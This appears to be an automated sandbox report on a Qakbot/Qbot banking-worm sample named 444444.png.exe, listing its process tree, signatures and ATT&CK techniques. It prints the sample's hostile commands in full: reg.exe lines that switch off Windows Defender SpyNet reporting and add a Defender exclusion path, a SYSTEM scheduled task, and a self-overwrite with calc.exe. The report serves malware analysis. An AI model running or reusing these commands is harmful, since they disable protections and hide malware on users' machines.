Analysis

  • max time kernel
    138s
  • resource
    win10v191014
  • submitted
    27-01-2020 17:27

General

  • Target

    444444.png

  • Sample

    200127-qphfsygwzj

  • SHA256

    2ada31879ae7419da5f19095e6a086938475e97f8b022fe24bf25208778eb850

Malware Config

Signatures

  • Windows security bypass 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs
  • Qakbot/Qbot

    Qbot or Qakbot is a sophisticated worm with banking capabilities

  • Turn off Windows Defender SpyNet reporting 6 IoCs
  • Adds Run entry to start application 2 TTPs 1 IoCs
  • Windows security modification 2 TTPs 7 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

Processes

  • C:\Users\Admin\AppData\Local\Temp\444444.png.exe
    "C:\Users\Admin\AppData\Local\Temp\444444.png.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4960
    • C:\Users\Admin\AppData\Local\Temp\444444.png.exe
      C:\Users\Admin\AppData\Local\Temp\444444.png.exe /C
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Checks SCSI registry key(s)
      PID:5016
    • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
      C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious behavior: MapViewOfSection
      PID:304
      • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
        C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe /C
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        PID:2876
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Adds Run entry to start application
        PID:3976
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn bhyxncgjol /tr "\"C:\Users\Admin\AppData\Local\Temp\444444.png.exe\" /I bhyxncgjol" /SC ONCE /Z /ST 18:30 /ET 18:42
      2⤵
        PID:1988
    • C:\Users\Admin\AppData\Local\Temp\444444.png.exe
      C:\Users\Admin\AppData\Local\Temp\444444.png.exe /I bhyxncgjol
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        2⤵
        • Turn off Windows Defender SpyNet reporting
        • Windows security modification
        PID:4936
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
        2⤵
        • Turn off Windows Defender SpyNet reporting
        • Windows security modification
        PID:772
      • C:\Windows\system32\reg.exe
        C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
        2⤵
          PID:2404
        • C:\Windows\system32\reg.exe
          C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
          2⤵
            PID:3588
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
            2⤵
            • Turn off Windows Defender SpyNet reporting
            • Windows security modification
            PID:4976
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\SpyNet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
            2⤵
            • Turn off Windows Defender SpyNet reporting
            • Windows security modification
            PID:2980
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"
            2⤵
            • Turn off Windows Defender SpyNet reporting
            • Windows security modification
            PID:4180
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet" /f /t REG_DWORD /v "SubmitSamplesConsent" /d "2"
            2⤵
            • Turn off Windows Defender SpyNet reporting
            • Windows security modification
            PID:2856
          • C:\Windows\system32\reg.exe
            C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /t REG_DWORD /v "C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg" /d "0"
            2⤵
            • Windows security bypass
            PID:5088
          • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            2⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            • Executes dropped EXE
            PID:1996
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
              C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe /C
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Executes dropped EXE
              • Checks SCSI registry key(s)
              PID:876
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\Windows\System32\calc.exe" > "C:\Users\Admin\AppData\Local\Temp\444444.png.exe"
            2⤵
              PID:4604
              • C:\Windows\system32\PING.EXE
                ping.exe -n 6 127.0.0.1
                3⤵
                • Runs ping.exe
                PID:672
            • C:\Windows\system32\schtasks.exe
              "C:\Windows\system32\schtasks.exe" /DELETE /F /TN bhyxncgjol
              2⤵
                PID:4656

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Persistence

            Registry Run Keys / Startup Folder

            1
            T1060

            Defense Evasion

            Disabling Security Tools

            2
            T1089

            Modify Registry

            3
            T1112

            Discovery

            Remote System Discovery

            1
            T1018

            Query Registry

            1
            T1012

            Peripheral Device Discovery

            1
            T1120

            System Information Discovery

            1
            T1082

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.dat
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            • C:\Users\Admin\AppData\Roaming\Microsoft\Amcesyg\hjgnohza.exe
            • memory/304-5-0x0000000002600000-0x000000000263B000-memory.dmp
              Filesize

              236KB

            • memory/876-9-0x0000000002A50000-0x0000000002A51000-memory.dmp
              Filesize

              4KB

            • memory/2876-4-0x0000000002A00000-0x0000000002A01000-memory.dmp
              Filesize

              4KB

            • memory/5016-0-0x0000000002960000-0x0000000002961000-memory.dmp
              Filesize

              4KB